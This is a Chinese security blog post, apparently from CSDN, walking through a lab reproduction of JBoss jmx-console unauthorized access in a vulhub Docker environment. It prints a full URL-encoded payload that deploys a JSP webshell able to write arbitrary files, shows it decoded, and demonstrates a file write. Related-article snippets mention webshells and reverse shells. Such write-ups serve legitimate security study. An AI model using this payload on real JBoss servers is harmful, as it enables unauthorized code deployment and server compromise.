Jboss未授权访问

最新推荐文章于 2024-05-12 08:00:00 发布
最新推荐文章于 2024-05-12 08:00:00 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44880255/article/details/119596450
版权

1、jmx-console未授权访问

漏洞原因

JBoss默认访问jmx-console页面不需要输入密码,可以进入配置war包进行危险操作。或默认用户名密码为admin/admin。

漏洞复现

这里使用的环境是kali中的vulhub和docker。
进入vulhub/jboss/CVE-2017-12149目录,执行命令docker-compose up -d开启环境。
访问http://your-ip:8080/。(这里我的IP是172.17.0.1)

在这里插入图片描述

构造payload部署war包。
http://172.17.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

这里arg0代表war包的名称、arg1=文件名称	、arg2=文件后缀名、arg3=文件内容。

arg3解码后的内容:<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>(f表示文件名,t表示文件内容)

访问构造的url出现如下页面:
在这里插入图片描述
回到jmx-console页面,查看jboss.web.deployment下存在自己部署的war包。
在这里插入图片描述
再构造一个url创建html文件,http://172.17.0.1:8080/shell/shell.jsp?f=1.html&t=successful。
访问这个html文件http://172.17.0.1:8080/shell/1.html。显示如下页面则创建成功:
在这里插入图片描述
还可以上传jsp一句话木马文件,利用工具去连接,这里就不演示了。

Anony吧
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
JBOSS授权漏洞总结
m0_64481831的博客
04-03 1006
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS授权访问漏洞介绍漏洞原理JBOSS授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
jbaoo4.2.3-jmx-console授权访问.docx
04-10
jbaoo4.2.3-jmx-console授权访问
授权访问JBoss授权访问漏洞
最新发布
qq_68163788的博客
05-12 428
JBoss授权访问漏洞是指攻击者可以通过构造特定的请求包,在授权的情况下远程执行命令,进而控制服务器。该漏洞主要影响JBoss管理界面,由于默认配置下,JBoss管理界面存在弱口令和默认账户等问题,因此容易被攻击者利用。 攻击者通过向JBoss管理界面发送恶意请求,可以实现对服务器的远程命令执行、文件上传等操作。此外,由于JBoss管理界面存在多个版本,不同版本的漏洞细节也存在差异,因此需要根据具体情况进行修复。
Jboss历史漏洞利用 - JMX Console 授权访问漏洞
HAKUNAMATATATTA的博客
12-08 2190
JbosswebUI界面 http://ip:port/jmx-console 授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell
Jboss弱口令Getshell
HAKUNAMATATATTA的博客
12-09 1281
JBoss Administration Console存在默认账号密码admin/vulhub,如果Administration Console可以登录,就可以在后台部署war包getshell。
java jmx agent不安全的配置漏洞
weixin_51378457的博客
03-15 4537
APP应该以明示或自愿同意的方式告知用户其需要收集的信息类型、范围、目的、使用方法、储存期限、安全保护措施等信息,并在获得用户授权前明确告知用户数据是否会分享、转让等情况。在搜集用户信息时,需明确具体收集哪些信息,以及收集的目的和用途等。APP应该尊重用户的知情权、选择权、访问权、更正权、删除权、注销权等权益,让用户能够随时查看自己的信息,可以对其进行更正、删除等操作。APP应该合法、公正地收集个人信息,包括在合法法律、法规、规章、标准规定范围内的行为,如经过用户授权同意,且该同意为自愿行为等。
jboss--JMX Console授权访问
hovcfuti的博客
10-13 576
然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。若需登录,可以尝试爆破弱口令登录。返回JMX Console里面,刷新找到jboss.web.deployment,如果出现上传的war,则部署成功。
JBOSS授权访问
jia3643的博客
09-28 1304
0X01、漏洞描述 jobss 授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 fofa找个站,访问 //jmx-console/ 0X02、漏洞复现 思路一 进入 jboss.deployment 部署页面 cs搭建web服务器,上传木马,通过addurl进行远程部署 部署成功后访问 目录文件名,便可进入木马。eg:AAA.war 则访问 /AAA/index.jsp 思路二:直接构造poc /jmx-conso
jboss 4.2.3
04-20
6. **安全特性**:JBoss 4.2.3提供了基于角色的访问控制(RBAC)和认证机制,以确保只有授权的用户和应用程序可以访问服务器资源。它还支持LDAP(轻量级目录访问协议)集成,便于与企业身份管理系统配合使用。 7. *...
JBoss安全优化
11-16
JBoss 安全优化主要关注的是提升服务器的安全性,防止授权访问和敏感信息泄露。在JBoss中,可以通过多种方式来强化系统安全,包括数据源配置加密、使用HTTPS协议、设置定时登出机制以及调整错误页面重定向等措施。...
jboss解压版
01-03
JBoss提供了一整套的安全机制,包括身份验证授权、加密和安全管理策略,确保企业应用的数据安全。 9. **版本历史与升级** JBoss经历了一系列的版本迭代,如JBoss AS、WildFly、JBoss EAP等。每次升级都引入了新...
jboss-as-master
09-11
5. **安全管理**:提供了强大的身份验证授权机制,能够对用户访问进行精细控制。 6. **性能优化**:JBoss AS通过内置的缓存技术如Infinispan和数据网格服务,提高了数据访问速度和整体性能。 7. **诊断与监控**...
jboss-eap-7.1.0
03-08
2. **安全管理**:EAP 7.1.0提供了一套完善的安全框架,包括角色基础的访问控制(RBAC)、统一认证和授权(PAM)、以及SSL/TLS支持,确保应用和服务的安全性。 3. **Web服务**:支持WS-*标准,包括SOAP、WSDL和UDDI...
JBOSS授权漏洞详细复现
柠鹿的轨迹
11-06 6148
0x00 前言 习常规而明其理,探非凡且有所见。 --涂寐 0x01 JBOSS授权访问简介 JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。 JBOSS授权访问漏洞表现为,在默认情况下无需账密就可以直接访问 http://127.0.0.1:8080/jmx-console 进入管理控制台,进而导致网站信息泄露、服务器被上传...
Jboss授权访问getshell(JMX-Console)
weixin_51151498的博客
12-10 1079
Jboss授权访问getshell(JMX-Console)
JBoss漏洞:Jboss授权访问漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 959
Jboss授权访问漏洞合集:JBOSS授权访问漏洞表现为,在默认情况下无需账密就可以直接访问http://127.0.0.1:8080/jmx-console进入管理控制台,进而导致网站信息泄露、服务器被上传shell(如反弹shell,wget写webshell文件),最终网站被攻陷。 该漏洞影响所有低版本的JBOSS,对其下用户影响深远. JBoss 4 使用vulnhub提供的环境
JBoss 授权访问和弱口令复现
weixin_53747497的博客
02-21 1384
一个基于J2EE的开放源代码的应用服务器。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。JbossJava EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub。
授权访问漏洞笔记
m0_47599604的博客
04-05 1534
授权访问 介绍 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 B/S架构中 一般存在后台界面中,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。 C/S架构中 一般存在默认安装的一些客户端应用程序中,安装人员因缺少安全意识导致攻击者利用。 数据库...
Jboss账号密码、jboss网站跟目录、Jboss弱口令
qq_45300786的博客
04-14 3309
我们在JBoss安 装目录/server/default/config下找到它,并进行JBoss配置。查找名字为:jmx-console的application- policy: <application-policy name = "jmx-console"> <authentication> <login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule" flag = "required"&
常见授权访问漏洞总结1
08-04
本文主要探讨了多个常见的授权访问漏洞,涉及的IT服务和组件包括Redis、MongoDB、Jenkins、Memcached、JBOSS、VNC、Docker、ZooKeeper、Rsync、Atlassian Crowd、CouchDB、Elasticsearch和Hadoop。这些漏洞的共同...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值